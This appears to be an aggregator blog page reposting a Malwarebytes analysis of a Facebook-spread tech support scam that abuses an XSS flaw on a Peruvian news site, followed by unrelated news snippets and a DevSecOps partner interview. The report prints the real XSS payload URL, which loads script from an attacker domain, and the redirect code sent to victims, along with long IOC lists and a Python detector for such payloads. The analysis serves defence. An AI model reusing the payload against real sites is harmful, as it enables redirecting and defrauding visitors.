Malware Devil

Wednesday, October 21, 2020

XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability

Tech support browser lockers continue to be one of the most common web threats. Not only are they a problem for end users who might end up on the phone with scammers defrauding them of hundreds of dollars, they’ve also caused quite the headache for browser vendors to fix.

Browser lockers are only one element of a bigger plan to redirect traffic from certain sites, typically via malvertising chains from adult portals or sites that offer pirated content.

There’s a slightly different campaign that we’ve been tracking for several weeks due to its high volume. Threat actors are relying on Facebook to distribute malicious links that ultimately redirect to a browser locker page. Their approach is interesting because it involves a few layers of deception, including abusing a cross-site scripting vulnerability (XSS) on a popular website.

Malicious links shared via Facebook

Links posted onto social media platforms should always be scrutinized as they are a commonly abused way for scammers and malware authors to redirect users onto undesirable content. For this reason, you might see a disclaimer when you click on a link, warning you that it could be spam or dangerous.

The campaign we looked at appears to exclusively use links posted on Facebook, which is fairly unusual considering that traditionally tech support scams are spread via malvertising. Facebook displays a warning for the user to confirm that they want to follow the link. In this case, the destination is further obscured by the fact that the link is a bit.ly shortened URL.

The threat actor is using the bit.ly URL shortener to craft the first stage of redirection. In total, we catalogued 50 different bit.ly links (see IOCs) over a 3-month period, suggesting that there is regular rotation to avoid blacklisting.

Although we do not know exactly how these links are being shared with Facebook users, we have some indication that certain games (i.e. apps on the Facebook site) may help to spread them. Because this is out of our reach, we have alerted Facebook in case it is able to identify the exact source.

Abuse of cross-site scripting vulnerability

The bit.ly URL triggers the second stage redirection that involves a Peruvian website (rpp[.]pe) which contains a cross-site scripting vulnerability (XSS) that allows for an open redirect. Threat actors love to abuse open redirects as they lend some legitimacy to the URL they send victims. In this instance, the news site is perfectly legitimate and draws over 23 million visits a month.

In this case, we can see that code is being passed into the URL in order to load external JavaScript code from buddhosi[.]com, a malicious domain controlled by the attackers.

rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}

The JavaScript in turn creates the redirection to the browlock landing page by using the replace() method:

top.location.replace('https://BernetteJudeTews[.]club/home/anette/?nr=855-472-1832&'+window.location.search.substring(1));

Besides redirecting users to other sites, an attacker could exploit the XSS to rewrite the current page into anything they like.

We reported this issue to Grupo RPP but have not heard back at the time of publication.
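The injected search query above is easy to spot once the parameter is percent-decoded. The following Python script is an added example (not code from the post, from Malwarebytes, or from the affected site): it decodes each query parameter of a request, parses the decoded value as HTML, and reports any script tag whose src points off-site, flagging hosts that match the six cloaking domains the post documents. The access-log lines are constructed for this example and mirror the URL shape shown above; domains stay defanged with [.] and are refanged only for parsing.

```python
"""Spot reflected <script src=...> payloads in search-query parameters.

Added example, not code from the original post or from the sites it
describes. The log lines below are constructed; the first one mirrors the
payload shown in the post, the others are benign or same-site requests.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, unquote, urlsplit

# Third-stage cloaking domains named in the post (defanged as written there).
CLOAKING_DOMAINS = {
    "buddhosi[.]com", "joinspinclass[.]com", "suddhosi[.]com",
    "thourwiringus[.]com", "totalgodin[.]com", "tuoliushigao[.]com",
}


def refang(text):
    """Turn the defanged 'example[.]com' notation back into a parseable host."""
    return text.replace("[.]", ".")


def defang(host):
    """Defang a hostname again before reporting it."""
    return host.replace(".", "[.]")


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.srcs.extend(v for k, v in attrs if k.lower() == "src" and v)


def script_srcs_in(fragment):
    """Return every <script src=...> value found in an HTML fragment."""
    collector = _ScriptSrcCollector()
    collector.feed(fragment)
    collector.close()
    return collector.srcs


def analyze_request(site_host, path_and_query):
    """Inspect one request path for injected off-site script loads.

    Returns a list of (parameter, script host, is_known_cloaking_domain)
    tuples with hosts defanged; an empty list means nothing was found.
    """
    parts = urlsplit("http://" + refang(site_host) + refang(path_and_query))
    findings = []
    for param, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded payloads.
        for src in script_srcs_in(unquote(value)):
            src_host = urlsplit(src).hostname or ""
            # Relative paths (no host) and same-site hosts are not reflected
            # external loads, so only off-site hosts are reported.
            if src_host and src_host != refang(site_host):
                dhost = defang(src_host)
                findings.append((param, dhost, dhost in CLOAKING_DOMAINS))
    return findings


# Constructed combined-log style lines (fbclid value is a placeholder).
SAMPLE_LOG = [
    '203.0.113.10 - - [21/Oct/2020:10:15:02 +0000] "GET /buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/?zg1lx5u0.js%27%3E%3C/script%3E&fbclid=PLACEHOLDER HTTP/1.1" 200 5120',
    '203.0.113.11 - - [21/Oct/2020:10:15:09 +0000] "GET /buscar?q=hoy HTTP/1.1" 200 4872',
    '203.0.113.12 - - [21/Oct/2020:10:16:30 +0000] "GET /buscar?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4900',
    '203.0.113.13 - - [21/Oct/2020:10:17:01 +0000] "GET /buscar?q=%3Cscript%20src=%22/static/app.js%22%3E%3C/script%3E HTTP/1.1" 200 4900',
]

_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan_log(lines, site_host):
    """Return {request path: findings} for each line with an off-site script load."""
    hits = {}
    for line in lines:
        match = _REQUEST_RE.search(line)
        if not match:
            continue
        findings = analyze_request(site_host, match.group(1))
        if findings:
            hits[match.group(1)] = findings
    return hits


if __name__ == "__main__":
    for path, found in scan_log(SAMPLE_LOG, "rpp[.]pe").items():
        for param, host, known in found:
            label = "KNOWN CLOAKING DOMAIN" if known else "off-site script"
            print(f"{label}: parameter '{param}' loads a script from {host} ({path[:40]}...)")
```

The same check applies to the reflected value on the server side: a search page that HTML-encodes the query before echoing it would not have let the injected tag execute at all.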

Cloaking domains

The open redirect trick is something that was added later on in the campaign. Originally the threat actors were directly loading decoy cloaking domains. Their purpose is to check incoming traffic and only serve the malicious content to legitimate victims. This is a very common practice and we’ve seen this before, for example with fake recipe sites.

We documented 6 domains involved in this third stage of the redirection process:

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Server-side checks ensure visitors meet the requirements, namely a legitimate US residential IP address, and custom JavaScript is then served (an empty JavaScript file is returned for non-interesting traffic).

The code (shared above) loads the browser locker landing page from one of the disposable and randomly-named domains using one of the newer TLDs:

.casa
.site
.space
.club
.icu
.bar

We collected close to 500 such domains (see IOCs) during a period of a few months, but there are likely many more.

Browser locker at the end of the chain

The browser locker fingerprints the user to display the appropriate version for their browser. It shows an animation mimicking a scan of current system files and threatens to delete the hard drive after five minutes.

Of course this is all fake, but it’s convincing enough that some people will call the toll-free number for assistance. In all, we collected almost 40 different phone numbers (see IOCs) but this is not an exhaustive list.

This is where it ends for the traffic scheme, but where it truly begins for the tech support scam. We did not make contact with the call centre, but we know very well how this next part plays out.

Malwarebytes users were already protected against this browser locker, thanks to our Browser Guard web protection. We will continue to track and report this campaign.

Thanks to Marcelo Rivero for helping with the replay and Manuel Caballero for his insights on the XSS.

Indicators of Compromise


The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malware Devil.



https://malwaredevil.com/2020/10/21/xss-to-tss-tech-support-scam-campaign-abuses-cross-site-scripting-vulnerability-2/?utm_source=rss&utm_medium=rss&utm_campaign=xss-to-tss-tech-support-scam-campaign-abuses-cross-site-scripting-vulnerability-2

FIRST Announces Cyber-Response Ethical Guidelines

The 12 points seek to provide security professionals with advice on ethical behavior during incident response.

The post FIRST Announces Cyber-Response Ethical Guidelines appeared first on Malware Devil.



https://malwaredevil.com/2020/10/21/first-announces-cyber-response-ethical-guidelines/?utm_source=rss&utm_medium=rss&utm_campaign=first-announces-cyber-response-ethical-guidelines

Oracle Releases Another Mammoth Security Patch Update

October’s CPU contains 402 patches for vulnerabilities across 29 product sets, many of which are remotely executable without the need for authentication.

The post Oracle Releases Another Mammoth Security Patch Update appeared first on Malware Devil.



https://malwaredevil.com/2020/10/21/oracle-releases-another-mammoth-security-patch-update/?utm_source=rss&utm_medium=rss&utm_campaign=oracle-releases-another-mammoth-security-patch-update

XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability

Tech support browser lockers continue to be one of the most common web threats. Not only are they a problem for end users who might end up on the phone with scammers defrauding them of hundreds of dollars, they’ve also caused quite the headache for browser vendors to fix.

Browser lockers are only one element of a bigger plan to redirect traffic from certain sites, typically via malvertising chains from adult portals or sites that offer pirated content.

There’s a slightly different campaign that we’ve been tracking for several weeks due to its high volume. Threat actors are relying on Facebook to distribute malicious links that ultimately redirect to a browser locker page. Their approach is interesting because it involves a few layers of deception including abusing a cross-site scripting vulnerability (XSS) on a popular website.

Malicious links shared via Facebook

Links posted onto social media platforms should always be scrutinized as they are a commonly abused way for scammers and malware authors to redirect users onto undesirable content. For this reason, you might see a disclaimer when you click on a link, warning you that it could be spam or dangerous.

The campaign we looked at appears to exclusively use links posted on Facebook, which is fairly unusual considering that traditionally tech support scams are spread via malvertising. Facebook displays a warning for the user to confirm that they want to follow the link. In this case, the destination is further obscured by the fact that the link is a bit.ly shortened URL.

The threat actor is using the bit.ly URL shortener to craft the first stage of redirection. In total, we catalogued 50 different bit.ly links (see IOCs) over a 3 month period, suggesting that there is regular rotation to avoid blacklisting.

Although we do not know exactly how these links are being shared with Facebook users, we have some indication that certain games (i.e. apps on the Facebook site) may help to spread them. Because this is out of our reach, we have alerted Facebook in case it is able to identify the exact source.

Abuse of cross-site scripting vulnerability

The bit.ly URL triggers the second stage redirection that involves a Peruvian website (rpp[.]pe) which contains a cross-site scripting vulnerability (XSS) that allows for an open redirect. Threat actors love to abuse open redirects as it gives some legitimacy to the URL they send victims. In this instance, the news site is perfectly legitimate and draws over 23 million visits a month.

In this case, we can see that code is being passed into the URL in order to load external JavaScript code from buddhosi[.]com, a malicious domain controlled by the attackers.

rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/
?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}

The JavaScript in turn creates the redirection to the browlock landing page by using the replace() method:

top.location.replace('https://BernetteJudeTews[.]club/home/anette/?
nr=855-472-1832&'+window.location.search.substring(1));

Besides redirecting users to other sites, an attacker could exploit the XSS to rewrite the current page into anything they like.

We reported this issue to Grupo RPP but have not heard back at the time of publication.

Cloaking domains

The open redirect trick is something that was added later on in the campaign. Originally the threat actors were directly loading decoy cloaking domains. Their purpose is to check incoming traffic and only serve the malicious content to legitimate victims. This is a very common practice and we’ve seen this before, for example with fake recipe sites.

We documented 6 domains involved in this third stage of the redirection process:

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Server-side checks ensure visitors meet the requirements, namely a legitimate US residential IP address, and custom JavaScript is then served (an empty JavaScript is returned for non-interesting traffic).

The code (shared above) loads the browser locker landing page to one of the disposable and randomly-named domains using one of the newer TLDs:

.casa
.site
.space
.club
.icu
.bar

We collected close to 500 such domains (see IOCs) during a period of a few months, but there are likely many more.

Browser locker at the end of the chain

The browser locker fingerprints the user to display the appropriate version for their browser. It shows an animation mimicking a scan of current system files and threatens to delete the hard drive after five minutes.

Of course this is all fake, but it’s convincing enough that some people will call the toll-free number for assistance. In all, we collected almost 40 different phone numbers (see IOCs) but this is not an exhaustive list.

This is where it ends for the traffic scheme, but where it truly begins for the tech support scam. We did not make contact with the call centre, but we know very well how this next part plays out.

Malwarebytes users were already protected against this browser locker, thanks to our Browser Guard web protection. We will continue to track and report this campaign.

Thanks to Marcelo Rivero for helping with the replay and Manuel Caballero for his insights on the XSS.

Indicators of Compromise

Bitly links

bit[.]ly/2BnL1gb
bit[.]ly/2BT9fyU
bit[.]ly/2Ci8vU7
bit[.]ly/2CmSeNo
bit[.]ly/2CYEQ2V
bit[.]ly/2D1Xt64
bit[.]ly/2Do8rTA
bit[.]ly/2DoLMGh
bit[.]ly/2DpBAO3
bit[.]ly/2W5TLOW
bit[.]ly/2WggcRI
bit[.]ly/2Whuz8f
bit[.]ly/3ffMoLv

bit[.]ly/2XylAQS
bit[.]ly/2YQ6Nll
bit[.]ly/2YUEJh1
bit[.]ly/2Z8u2Y6
bit[.]ly/2Zf9f5g
bit[.]ly/30B8frz
bit[.]ly/30OBrge
bit[.]ly/312yDMe
bit[.]ly/2E4iPQg
bit[.]ly/2EVqXDf
bit[.]ly/2NJPNad
bit[.]ly/2SKSKtG
bit[.]ly/2W0EVJx

bit[.]ly/313QfpY
bit[.]ly/31nuzVZ
bit[.]ly/33j18GQ
bit[.]ly/33RHphZ
bit[.]ly/33TnMGp
bit[.]ly/33U4KzW
bit[.]ly/36XhNlF
bit[.]ly/39kxqT9
bit[.]ly/39Lpf2I
bit[.]ly/3a1vjnz
bit[.]ly/3ehykAR
bit[.]ly/3eQ8Rib
bit[.]ly/3fDTxpu

bit[.]ly/3fNbwdP
bit[.]ly/3gfDRJw
bit[.]ly/3gi7sTi
bit[.]ly/3gSXmbh
bit[.]ly/3gvG3gI
bit[.]ly/3hlBUvE
bit[.]ly/3iLGu8b
bit[.]ly/3jcvfVC
bit[.]ly/3jk66sh
bit[.]ly/3jU5Q3Z
bit[.]ly/3kgIwxF

Cloaking domains

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Browlock domains

abagailliondaye[.]site
addiatraciedur[.]casa
adianaeadmundfaunia[.]casa
adriaensherveymanson[.]space
aidadarnallkondon[.]casa
ailynhoratiowallford[.]space
akselholm[.]space
alanaweekes[.]casa
alexandervolodin[.]site
alexaschulteisz[.]space
alexinasandersjeddy[.]casa
alexinemunroelanni[.]space
alineorbadiahbakerman[.]space
allegradoyclaudette[.]space
almedacorbiemyrta[.]club
alondramendez[.]space
aloysiapatbergwall[.]space
altapippomarjory[.]casa
alvenystrom[.]site
alysonbartolemohaze[.]casa
amandarocha[.]site
amandisamsonpattin[.]space
ameliabernays[.]bar
ameliebrown[.]icu
amiesinclair[.]space
anallesewolfiecacie[.]space
andreachrissyglaudia[.]space
andrewvasiliev[.]space
angelicajohnsen[.]casa
angelilaireberns[.]space
annadianakelleybowra[.]space
annalisearchylandau[.]casa
annicecurreyinglebert[.]site
anthewaltonbacon[.]casa
anupakarinen[.]space
aputsiaqjosefsen[.]space
arlienerutgeremmey[.]site
arlindapaulotrix[.]casa
ashlyjdavielonee[.]site
audricpanetier[.]space
aurooragabrielepahl[.]site
auroraaylmarosmo[.]casa
avalundstrom[.]casa
balazsforgacs[.]space
barbialbiedanit[.]space
beatrizmartins[.]space
beaurbandonoho[.]casa
belindapattinyorick[.]site
benbaxter[.]casa
berenicebrighamklug[.]site
bertapisano[.]casa
bertharockwellgans[.]space
bertinarothesmerolda[.]site
bertinebrendintremml[.]casa
bertyemmanuelbeaufert[.]site
bettineallynnoemi[.]casa
billyemichelethacher[.]casa
billygreen[.]casa
blaireredemalee[.]space
boriskapalfi[.]casa
caitlinluigigypsie[.]casa
caitlinpetersen[.]space
callumlittle[.]site
calvinbridges[.]club
careyheinrikornstead[.]space
carlaellwoodobadiah[.]casa
carlyejoaquinfrederica[.]site
carlynnshelldorey[.]space
carmeltristanjeremiah[.]casa
carolinepeadarstutman[.]space
carynkristoforopleione[.]site
catharinaewansouthworth[.]space
celiechristofferrochester[.]casa
celinagrahamtollmann[.]site
charlesthornton[.]bar
charleyferguson[.]space
cherilynrolferoselin[.]casa
cherishhurleyburrus[.]casa
cherlyncourtgrannias[.]site
cherylkristopherannice[.]site
chicasackville[.]casa
chicovangriensven[.]site
christacullinclem[.]space
christinehermansen[.]space
christoperkim[.]club
chrysaheinrikromo[.]space
cibranjasso[.]casa
cilkabuddieradmen[.]space
clarettanicolahannus[.]site
clareykonstantinelipkin[.]site
clariangieeddi[.]space
codieriewebb[.]site
colenerodricksipple[.]space
colettenildelaney[.]space
collycazlal[.]club
constantachaddcoleen[.]space
coralineottomalcom[.]space
cornelagregoireriannon[.]casa
correnaosbornwatters[.]space
corriethaddusnero[.]casa
courtnaycullanartimas[.]space
courtneydunn[.]site
courtneyshaw[.]casa
csabatotth[.]space
cybilloatesotho[.]club
cynthiejoshuagoetz[.]casa
dagurarnbjarnarson[.]space
daniaumbertobraunstein[.]site
darellecorteldridge[.]space
darlaleopoldlandri[.]space
darlenegarcia[.]space
deanstreeten[.]club
debbynoelfugazy[.]casa
diederikfaro[.]casa
ditajaridhancock[.]space
dominicbyrne[.]club
donaldking[.]casa
donatilavela[.]casa
doniellejarrettherwick[.]space
doratiboldjapeth[.]casa
dorelleolinsiusan[.]casa
dorenerossclemente[.]casa
dorisferguson[.]site
dorriestubridie[.]casa
dronafeliziowallace[.]club
dyannrichalona[.]site
eberardobustamante[.]casa
eboneebritseltzer[.]space
edittafanucci[.]space
eduardasantos[.]casa
edwardmarr[.]casa
elbertinawaymalina[.]site
electratobinlori[.]space
elinorecyrusrosalind[.]site
elisabetmahmudziguard[.]casa
ellasaari[.]space
ellereid[.]site
ellihermannsheldon[.]casa
emmalynhenriwinsor[.]site
erdagarephenica[.]club
erminiekurtisberard[.]site
ethelinemuffinpierrette[.]casa
ethelynezekielpepito[.]space
evagorbunova[.]space
evascarfe[.]space
evelinemikolviveca[.]space
ezinetshishani[.]casa
fancieogdanwanyen[.]site
fannymackkellby[.]site
fatramcharan[.]icu
feikjewestenbrink[.]icu
felicytasobczak[.]space
felixkomarov[.]site

fiannkipparisaac[.]casa
filidelucianrus[.]casa
floraabrahamsson[.]site
florisburrparadies[.]space
franceskint[.]casa
frankmejias[.]space
freddieholden[.]space
fredrikigland[.]site
frigyesbakos[.]club
fulcovangemert[.]casa
gabrielduffy[.]casa
gabriellacunneen[.]club
gabriellamarsden[.]space
gaynorchevaliermollie[.]space
georgecreswick[.]icu
germaisenia[.]uno
gertiereggyun[.]casa
gianninafonville[.]store
gillianlindseymobley[.]casa
ginnikipvedis[.]casa
giudittademetrestuppy[.]site
giulioferrari[.]club
glennconantkaete[.]casa
greerjorgangarcon[.]casa
gretchenmorgenfrans[.]casa
guineveremorgenphilipson[.]space
gundolphochubbbaggins[.]space
gusursongerhard[.]space
gwendolenworthcower[.]club
hamzenolet[.]space
hanabinkykasevich[.]casa
hannahkaur[.]space
harriottheodoricmartinez[.]space
heidiingamarkaenel[.]casa
hollyhardy[.]space
hopechaddbrogle[.]site
hyacinthreuvengronseth[.]casa
ileanaroryfarika[.]casa
ilonayusupova[.]space
ilsepiirto[.]casa
ingebergrudyjacintha[.]space
ingridharlinaekerly[.]casa
iolandecreightonnona[.]space
iritapietreklow[.]space
isabelaalmeida[.]site
isembardgreenhand[.]store
issysydneycharmain[.]site
isumbrasbrandagamba[.]club
ivalufilemonsen[.]casa
ivaluhansen[.]casa
ivalularsen[.]site
iversoreide[.]site
jacobsutherland[.]site
jacquelinehampson[.]space
jadechadzoara[.]casa
jaimecarliedaye[.]casa
jakebooth[.]club
jamesmiller[.]casa
jamesspofforth[.]club
jamieumstead[.]uno
janholm[.]site
jareddubose[.]space
jaromirbrynda[.]casa
jaspercaraballo[.]casa
jeanellejermainoleg[.]casa
jeannabroderickgrunenwald[.]casa
jenniferreed[.]club
jenninelammondtorto[.]site
jennovankooij[.]icu
jerrileeharrydyun[.]casa
jesperkristoffersen[.]site
jessamynfreemonhibben[.]casa
jessisylvesterkenison[.]space
jillaynemagnumallys[.]space
joaniealisteratwekk[.]casa
joanywilting[.]casa
joellydaltonhamel[.]site
joeyrudolfrebhun[.]casa
johnapascaleikey[.]casa
johnclark[.]icu
joinspinclass[.]com
jordannaholttakken[.]casa
jorgritter[.]space
josjasalah[.]site
juansmotherman[.]club
judiecosimoprudence[.]site
julieravn[.]space
juliettaheywooddunham[.]casa
kacyandershugon[.]site
kacybenoitarley[.]space
kajaaurthurzebulen[.]space
kalmandobos[.]site
karenbrands[.]casa
karitasvalberg[.]site
karlenronniesaidel[.]casa
karolgraememaye[.]space
kasperronning[.]casa
kasszaredphelan[.]space
katerinechuchowinston[.]space
katherinacedricbrynne[.]site
katinarooseveltmattox[.]space
katrinebrandt[.]casa
katushapallardolino[.]space
kauecavalcanti[.]site
kayleeamorymafalda[.]casa
keadaly[.]club
kerrychavez[.]icu
kessiaharonwentworth[.]space
kingapawlak[.]space
kippieeliasrachaba[.]space
kirakipplek[.]space
kirstialechulbard[.]space
kolosszegedi[.]site
kristelichaboderina[.]space
kristennowellsholley[.]casa
kristesylvesterblossom[.]casa
kristinejacobsen[.]site
krysiawojciechowska[.]casa
krystaltommyabell[.]casa
kylaasherrosenstein[.]space
kylamontishetrit[.]casa
laneydavinangell[.]site
larissasebastienhubie[.]space
laurelhewbasset[.]site
lauriannegermaynealithia[.]casa
lauriannetobyevalyn[.]casa
leannaralfpicardi[.]club
lechoslawczarnecki[.]site
lesliestorey[.]casa
lettiiorgoscathe[.]space
lettitracegow[.]casa
liaonio[.]site
liatimoteojacqui[.]casa
livandrea[.]icu
loisepatrickardie[.]space
lonnibasiliozirkle[.]casa
lorajerriprimavera[.]space
lorenzagiovannigiacomo[.]site
loriannalodovicoradloff[.]club
lorrinrodmignonne[.]space
lucievanrinsum[.]club
luisbarros[.]casa
lynseybrunotatman[.]casa
mabwinfrededelsten[.]space
maddyjarridolnee[.]site
madelindarrelbruyn[.]casa
marcellinevidovicmilinda[.]casa
marcoklug[.]casa
margarettedukieaeriel[.]space
margitfreedmangrider[.]site
margretedgarbabbie[.]casa
margretglynnadelice[.]casa
mariamnilsson[.]site
mariapfaff[.]casa
mariuslovstrom[.]casa
mariuszdudek[.]site
marnizebulonmarchese[.]space
masonpatel[.]space
mathildacaseopportina[.]site
maurakonradebenezer[.]club
mauritznystrom[.]space
maximinovaldes[.]casa
meghanncreightonoster[.]space
meralvangeer[.]space
merielbondonbelldas[.]space
merisbuironstatis[.]casa
merrillingeroscar[.]club
merryfabioavruch[.]space
meyaakesson[.]casa
mialeistad[.]space
mieszkoczarnecki[.]space
mikaelenoksen[.]site
milissentflorychard[.]casa
miriamvernesopher[.]space
mirnaandreyfischer[.]casa
mollieyveswestfall[.]site
monahreamonnjacintha[.]casa
morganajehukinchen[.]site
muirenolanhaydon[.]site
myrtleruss[.]casa
nanagal[.]icu
naomibolton[.]casa
nattybrendonleverett[.]casa
nedaholmesmilly[.]site
neddaboneamaras[.]club
nessiebogeyeugenio[.]site
nickieearliehelbona[.]site
nissaalfonsealexis[.]site
nixieholtadamski[.]space
noravestre[.]site
norbertschuil[.]casa
noreanlarsornas[.]casa
nursellamo[.]space
odelladevlinaleksandr[.]space
odettafalknerlenni[.]site
oliverraaen[.]space
olliemaclean[.]casa
omarbazhaev[.]space
paolaverhoef[.]space
peggyakselsmalley[.]site
penelopaelbertsonny[.]space
philgiordanolibbey[.]site
pongorfoldesi[.]casa
poppyinglissparke[.]casa
poulkristensen[.]space
quinnagustezandt[.]casa
rafinelisse[.]bar
ranabramran[.]casa
raquelaeduinochiles[.]casa
raymondsmith[.]casa
rayyangordon[.]casa
reavictorcherrita[.]casa
reynirjonatansson[.]site
reynirottosson[.]space
rianonkentonlira[.]space
ricagaylebernie[.]site
ricidewittflatto[.]space
riviboyceyvento[.]site
rivkahmayneazpurua[.]space
roannefrancoisgenny[.]space
roannestanislausolimpia[.]casa
robertfoley[.]space
robertsaunders[.]casa
robertweaver[.]space
ronaldestep[.]casa
ronnymortiesanburn[.]casa
rosabelleellswertheisenhart[.]casa
roseanniveadlay[.]casa
rosejaymeraouf[.]space
rosemondelelandneil[.]site
rupertaeddiefalk[.]space
sabrinagaertner[.]space
salviamugwort[.]space
samamerigoaldridge[.]site
samarialucienquinn[.]casa
samarknape[.]uno
samukatorok[.]space
sandraglebova[.]space
sanyaimmink[.]icu
sareeellereypenland[.]casa
savinareinwaldsteffen[.]site
scarlettlaycatherina[.]site
shannonmanfredoctave[.]site
shaynefrancklynwynne[.]site
sheelafarrisgare[.]casa
sheila-kathryntysonlatia[.]club
sheilayork[.]space
sherriehankcha[.]casa
sherriraddiechester[.]casa
sibyllepearcelaney[.]site
silviearaldorory[.]space
simonefreitag[.]club
sisilehoweyivanah[.]casa
siskolaatikainen[.]casa
solsausamov[.]space
starernestmcmillan[.]site
suddhosi[.]com
suewaldotacklind[.]casa
suomariihijarvi[.]casa
suzywordenmycah[.]casa
sylviakroon[.]site
tallydewsheley[.]club
taniburnabydarrill[.]casa
tanyarayhasty[.]casa
tedraadottinger[.]casa
teodorademetripettifer[.]casa
terrinathanaelgahl[.]space
theafrederiksen[.]space
thelmaantoniusibrahim[.]space
theresawalsh[.]icu
tienanevillepetrine[.]casa
tillyby[.]club
tillyheerson[.]space
timurvida[.]space
tinesidneefiedling[.]site
tomawyndhamrudolfo[.]space
topivuorinen[.]site
tordamdal[.]site
totalgodin[.]com
toussaintjobin[.]site
trinemathiasen[.]site
trudienehemiahblodget[.]space
trungbliek[.]site
utairvinshirk[.]space
veganystrom[.]space
veroniquegilbertonickey[.]casa
vesteinnyngvason[.]space
vibrockienorina[.]casa
vincenzokaur[.]space
vinniechrissiearlynne[.]site
vioarbirgisson[.]space
vitoriaoliveira[.]casa
wallislonkerrill[.]club
wilcomesandheaver[.]site
willhighett[.]club
williamsimonsen[.]casa
wynnedelmoremaison[.]space
wynnielorenprisca[.]casa
wynnyjobgratt[.]space
xavierholroyd[.]club
yingahmad[.]space
yoshikojaeheisser[.]casa
zakariaeotter[.]space
zomborgyarmathi[.]casa
zorinetownspiegelman[.]casa

Phone numbers

833-801-7232
844-762-9462
844-762-9467
844-793-6869
844-793-8637
844-794-5246
844-794-6678
844-794-6786
844-796-2946
844-833-8289
844-909-2777
855-241-4508
855-470-1718
855-470-1720
855-470-1721
855-470-1724
855-472-1830
855-472-1832
855-472-1833
855-472-1840
855-472-1844
855-626-2563
855-805-1138
855-805-1278
855-805-1285
855-827-2595
855-827-3045
855-885-0741
855-885-0784
855-885-0818
855-885-0830
855-885-0833
877-429-1222
888-597-1444
888-851-3768
888-851-5754
888-865-2158
888-866-6127
888-866-6299

The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malwarebytes Labs.

The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/xss-to-tss-tech-support-scam-campaign-abuses-cross-site-scripting-vulnerability/?utm_source=rss&utm_medium=rss&utm_campaign=xss-to-tss-tech-support-scam-campaign-abuses-cross-site-scripting-vulnerability

Delphix Partner Spotlight on Orasi

michelle
Wed, 10/21/2020 – 13:40

We spoke with Terry Brennan, Managing Director at Orasi, to learn how the company is helping customers blaze new trails in DevSecOps delivery and drive business transformation.
Oct 21, 2020

Tell us about Orasi and your core competencies.

We help our customers achieve faster, more predictable, and higher quality software delivery and operations by bringing deep DevSecOps expertise, strong technology partnerships like Delphix, and proven approaches across the DevSecOps spectrum. 

We offer a breadth of DevSecOps services including assessments, strategy and roadmaps, implementing automation tooling, process change/maturity, facilitating cultural change, and much more.

Our core competency is driving client success across the lifecycle by establishing a DevSecOps pipeline with continuous flow into production. This encompasses not only the familiar CI/CD processes but also includes specialized areas such as continuous data, continuous testing, continuous security, and continuous monitoring. 

Our goal is to bring the front end development, pipeline, security, and ongoing operations together to form a cohesive, efficient system for the many verticals we support—from financial services and healthcare to manufacturing and retail.  

What do you mean by ‘continuous data’?

We work with agile teams throughout the entire software lifecycle—from ideation, development, build, and testing—to ensure the pipeline is production-relevant. That relates to the environment configuration itself as well as the test data used. 

So we take the CI/CD pipeline and add the concept of continuous data. Essentially continuous data means automating the process of collecting production data, securing it, then providing automated access and restoration for use in the application delivery release train.

To establish a high quality, predictable pipeline, shift left testing needs to be as realistic as possible, as early as possible. Without production-quality test data, teams won’t expose the edge cases they need to thoroughly test. They run the risk of not being able to identify a complex data scenario that causes something to blow up further down the pipeline where it’s harder to triage and more expensive to fix.

With continuous data, data is now as agile as code. Access to ephemeral test environments that are automatically fed with secure, virtualized data allows dev and test teams to truly move at a pace required by the business.

Can you describe how you assess your client’s software pipeline?

Most of our clients have started their DevOps journey, and wherever they are in terms of maturity, tooling, and processes we work with them to convert their plan into reality.

We have several dozen categories that we look at as part of the assessment—their build and unit test process, how long it takes to get feedback to developers after functional testing, types of tools used, manual processes that can be eliminated, documentation, and more.  

We start with a standard approach for the assessment, but every customer is different. Some of our larger clients have 20 different tech stacks to address, for example. In the end, we create a custom solution and a detailed roadmap for moving forward.  

We are not just automating processes; we re-architect processes and help customers think about their pipelines in a completely different way. When we build out the future state we treat all pipeline elements as code. Everything should be integrated into an automated process, so data virtualization is essential. 

Driving faster testing and delivering test data quickly increases the speed and flow of the entire pipeline. Providing production-relevant data to application teams earlier in the release cycle means not only rapid cycle time but better feedback to address issues, which in turn have an exponential impact on cycle time and application quality.

When a pull request is made, for example, all elements of that build are tagged and versioned. If a problem occurs along the pipeline or even after changes are released into production, customers can automatically recreate the exact code changes, database versions used, and test configurations using Delphix.

What is the impact of continuous data as clients start to streamline processes?

Often clients are completely manual or have some scripting in place, so the improvements that continuous data and continuous testing bring can be pretty significant. In our initial assessment, we may find that running a single change through the pipeline originally takes 8-10 days plus multiple people. 

But if the pipeline elements are treated as code, all elements are automated and every testbed is working from the exact same virtual database, we can run multiple tests simultaneously. Starting with a clean, predictable state of the test data available to all test environments, we can have unlimited test runs going at the same time. 

We are able to turn a traditionally serial approach into an extremely efficient parallel process. When they can run multiple changes at the same time and execute to the same purpose using identical datasets, this can be a very powerful transformation. 

Transitioning from manual serial testing to automated parallel testing is really powerful.

